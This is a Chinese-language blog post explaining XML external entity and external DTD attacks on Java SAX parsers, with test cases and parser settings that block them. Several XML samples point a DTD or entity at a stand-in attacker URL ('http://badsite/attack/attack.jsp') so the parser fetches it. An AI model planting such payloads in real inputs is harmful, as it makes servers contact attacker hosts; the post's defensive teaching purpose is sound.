XML Attack

最新推荐文章于 2021-10-27 10:44:42 发布
最新推荐文章于 2021-10-27 10:44:42 发布
阅读量281 收藏
点赞数
分类专栏: XML 文章标签: XML Attack DTD

这篇文章主要介绍如何利用XML的DOCTYPE属性进行恶意攻击和如何防范这类的攻击。

 

我们先看2个XML应用片段

场景1:在XML使用DTD

family.xml

 

<?xml version="1.0" standalone="no"?>
<!DOCTYPE family SYSTEM "family.dtd">
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
</family>

 

family.dtd

<!ELEMENT family (member*)>
<!ATTLIST family lastname CDATA #REQUIRED>
<!ELEMENT member (#PCDATA)>
<!ATTLIST member memberid ID #REQUIRED>
<!ATTLIST member dad IDREF #IMPLIED>
<!ATTLIST member mom IDREF #IMPLIED>
 

 

场景2:在一个XML中引用另一个XML

family.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY other SYSTEM "other.xml">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
    &other;
</family>
 

other.xml

 

<?xml version="1.0" encoding="UTF-8"?>
<ok/>
 

Java解析代码示例:

 

 public static void main(String[] arg) throws Exception {
        InputStream is = this.getClass().getResourceAsStream("family.xml");
        DefaultHandler handler = new DefaultHandler();
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(false);

        SAXParser parser = f.newSAXParser();

        parser.parse(is, handler);
    }
 

在解析场景1和2中的family.xml时,若相关的文件的路径都正确,那么解析不会出现任何问题。若是场景1中family.dtd或者是场景2中的other.xml不存在时,我们就会发现解析时会出现如下异常:

 

Exception in thread "main" java.io.FileNotFoundException: /somepath/xxx/family.dtd (The system cannot find the file specified)
	at java.io.FileInputStream.open(Native Method)
	at java.io.FileInputStream.<init>(FileInputStream.java:106)
	at java.io.FileInputStream.<init>(FileInputStream.java:66)
	at sun.net.www.protocol.file.FileURLConnection.connect(FileURLConnection.java:70)
	at sun.net.www.protocol.file.FileURLConnection.getInputStream(FileURLConnection.java:161)
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:653)
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1315)
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1252)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanEntityReference(XMLDocumentFragmentScannerImpl.java:1906)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(XMLDocumentFragmentScannerImpl.java:3032)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:648)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(XMLDocumentFragmentScannerImpl.java:511)
	at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:808)
	at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:737)
	at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:119)
	at com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser.parse(AbstractSAXParser.java:1205)
	at com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl$JAXPSAXParser.parse(SAXParserImpl.java:522)
	at javax.xml.parsers.SAXParser.parse(SAXParser.java:395)
	at javax.xml.parsers.SAXParser.parse(SAXParser.java:198)

看到这个异常,你会想到什么?

 

在解析时它试图寻找family.dtd或者other.xml,那么我们是否可以用这个机制干点什么坏事

 

再看下面2个xml片段:

场景1更新:将dtd的地址指向http://badsite/attack/attack.jsp

 

<?xml version="1.0" standalone="no"?>
<!DOCTYPE family SYSTEM "http://badsite/attack/attack.jsp">
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
</family>
 

场景2更新:将other.xml指向http://badsite/attack/attack.jsp

 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
    &attack;
</family>
 

如果我们在去解析这2个xml片段,就会发现它会去访问http://badsite/attack/attack.jsp这个地址。此时想必你已经知道下一步该怎么做了吧。

 

 

那么如何防范这类破坏呢?

对于场景1,我们在解析xml时需要禁止加载额外的dtd和验证

 

f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
f.setFeature("http://xml.org/sax/features/validation", false);

 验证标记默认是为False的。

 

对于场景2,目前我还没有找到比较好的方式,只能在解析式时禁止使用doctype定义——比较粗鲁了。

 

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)

这种方式对场景1也是适用的。

 

 

对于场景1和2继续做了如下5组测试

组合1:

 

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
</family>

 出现异常:

Exception in thread "main" java.lang.NullPointerException
	at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:685)
	at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:364)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1141)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1090)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$PrologDriver.next(XMLDocumentScannerImpl.java:977)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:648)
	at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(XMLDocumentFragmentScannerImpl.java:511)
	at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:808)
	at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:737)
	at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:119)
	at com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser.parse(AbstractSAXParser.java:1205)
	at com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl$JAXPSAXParser.parse(SAXParserImpl.java:522)
	at javax.xml.parsers.SAXParser.parse(SAXParser.java:395)
	at javax.xml.parsers.SAXParser.parse(SAXParser.java:198)

 

组合2:

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
</family>
 

则解析通过,且并未访问http://badsite/attack/attack.jsp恶意页面

 

组合3:

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
    &attack;
</family>

 

解析通过,但要求访问http://badsite/attack/attack.jsp,将返回结果写入到xml中

 

组合4:

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE family  [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]>
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
    &attack;
</family>

解析失败,异常同组合1

 

组合5:

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" standalone="no"?>
<!DOCTYPE family SYSTEM "http://badsite/attack/attack.jsp">
<family lastname="Smith">
    <member memberid="m1">Sarah</member>
    <member memberid="m2">Bob</member>
    <member memberid="m3" mom="m1" dad="m2">Joanne</member>
    <member memberid="m4" mom="m1" dad="m2">Jim</member>
</family>

  无论设定 http://xml.org/sax/features/validation 与 http://apache.org/xml/features/nonvalidating/load-external-dtd 为True 或 False,解析都通过

 

 

综上:在解析xml时,忽略doctype定义是比较有效的方式。

 

iteye_339
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XML Attack Lightning Talk
04-22
XML Attack Lightning Talk
Web_for_Pentester_I之XML attacks
贝隆的博客
02-07 308
Web_for_Pentester_I之XML attacks
XMLParser解析工具
余温0218的博客
12-08 1060
工具思想在java学习中尤为重要。由于工具的存在,我们才能把心思放在真正的代码编写中,而不是被那些大量重复的代码搞的晕头转向的。要知道java的终极目标是代码复用!!! 那让我们以上上篇博文为例,将其变成一个xml解析工具。 这就是我们所给出的xml解析工具 import java.io.IOException; import java.io.InputStream; import javax....
XML文件读取报错IOException parsing XML document from URL
jimoandgudu的博客
10-27 2700
问题 XML配置文件最上方约束引用了“http://www.springframework.org/dtd/spring-beans.dtd” 因为网络原因,无法访问上面的地址。 解决 自己下载spring-beans.dtd文件 ,放在项目中 约束文件路径改为“classpath:/spring-beans.dtd” 最后面是文件内容 读取XML配置文件错误信息 [org.springframework.web.servlet.DispatcherServlet]Context initializatio
xml攻击 简介、示例、防范
weixin_42100211的博客
04-28 1928
在查找openpyxl的官方介绍时,注意到security这一栏提到了针对xml解析器的攻击。 介绍了什么是xml实体,各种xml实体攻击的基本思路,和其中一种xml攻击的demo。
XML注入攻击总结
qq_32238611的博客
09-08 1万+
XML注入攻击总结普通的XML注入 普通的XML注入 原理 XML注入攻击和SQL注入攻击的原理一样,利用了XML解析机制的漏洞,如果系统对用户输入"<",">"没有做转义的处理,攻击者可以修改XML的数据格式,或者添加新的XML节点,就会导致解析XML异常,对流程产生影响。 如何注入攻击 如下XML是用于注册访问用户,其中用户名是由用户自己输入的。 <?xml version="1.0" encoding="UTF-8" ?> <user role="gues
tinyxml工具类
11-20
int attack = player->AttributeInt("attack"); // ... 其他属性 } // 遍历其他元素和属性... } ``` 在软件开发中, TinyXML也常用于序列化和反序列化对象状态,这样可以保存用户设置,或者在不同阶段恢复程序...
cwec_latest.xml.zip
01-05
6. **相关攻击模式**: 描述了利用该弱点可能采取的攻击手段,这些攻击模式可能来自CAPEC(Common Attack Pattern Enumeration and Classification)系统。 XML文件的结构化特性使得数据可以通过编程语言(如Python...
Having Fun with XML Hacking
04-13
2. **Billion Laughs Attack**:这是一种拒绝服务(DoS)攻击,由于XML解析器处理大量嵌套的递归实体时会消耗大量资源,导致内存溢出或CPU过载。 3. **DTD (Document Type Definition) Injection**:通过篡改DTD,...
XML读写文档
04-22
处理XML时,需要注意防止XXE(XML External Entity Attack)和XSS(Cross-Site Scripting)攻击。为避免这些问题,应禁用外部实体解析,确保只解析安全的数据源,并使用最新的XML库以获得最新的安全修复。 总结,...
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2171
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
XML外部实体引用(XXE,XML External Entity attack)漏洞原理及其预防
qq_gfq的博客
03-26 5582
0x00 什么是XMLXML 指可扩展标记语言(EXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。和HTML类似,但HTML被设计来显示数据,XML被设计来传输数据。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。https://mp.csdn....
[XML外部实体攻击]XXE attack
weixin_34234829的博客
11-07 155
Pnig0s p.s:最近80Sec发表了一篇关于介绍XML实体注入漏洞的警告文章,其实查阅相关资料可以发现XML外部实体攻击相关技术早在02年就在国外被提出,文中明确提到几种编程语言的xml应用中均存在攻击风险,现将原文贴出: http://www.w3.org/TR/REC-xml#include-if-valid]:http://www.docu...
XML External Entities 攻击(XML外部实体注入)
weixin_45352161的博客
05-17 3497
使用配置的 XML 解析器无法预防和限制外部实体进行解析,这会使解析器暴露在 XML External Entities 攻击 之下 说明: XML External Entities 攻击可利用能够在处理时动态构建文档的 XML 功能。XML 实体可动态包含来自给定资 源的数据。外部实体允许 XML 文档包含来自外部 URI 的数据。除非另行配置,否则外部实体会迫使 XML 解 析器访问由 URI 指定的资源,例如位于本地计算机或远程系统上的某个文件。这一行为会将应用程序暴露给 XM
高效解析xml的总结,闲下来写的
网易搬砖选手
10-14 6965
#include "rapidxml.h" #include "rapidxml_utils.h"
XML Parser
天王盖地虎!
10-15 414
class TreeNode(object): def __init__(self, content): self.content = content self.children = [] def add_child(self, node): self.children.append(node) def XMLElementParser(XMLString, begin
微信XXE安全漏洞处理(Java)
热门推荐
Umbrella Corporation
09-14 2万+
登录微信提供处理XXE安全漏洞页面 地址:https://pay.weixin.qq.com/wiki/doc/api/micropay.php?chapter=23_5 原文如下: 最佳安全实践 关于XML解析存在的安全问题指引 微信支付商户,最近暴露的XML外部实体注入漏洞(XML External Entity Injection,简称 XXE),该安全问题是由XML组件默认没有禁...
SAXParser 解析 XML 时禁用外部 DTD 加载
jessica_it的专栏
07-28 2863
最近,我在用SAXBuilder将字符串解析为Document对象时发现,如果字符串中包含外部DTD,SAX会去访问URL加载此DTD。这样很容易产生连接超时的异常java.net.ConnectException: Connection。SAXBuilder saxBuilde
activemq 运行一段时间后报错,不能正常工作 Possible CSRF attack
最新发布
06-08
1. 禁用 CSRF 防护机制:在 ActiveMQ 的安装目录下,找到 conf/jetty.xml 文件,将其中的 CSRF 防护机制相关的配置注释掉,然后重新启动 ActiveMQ。注释掉的配置如下所示: ``` <!--<Ref id="csrf"/>--> ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值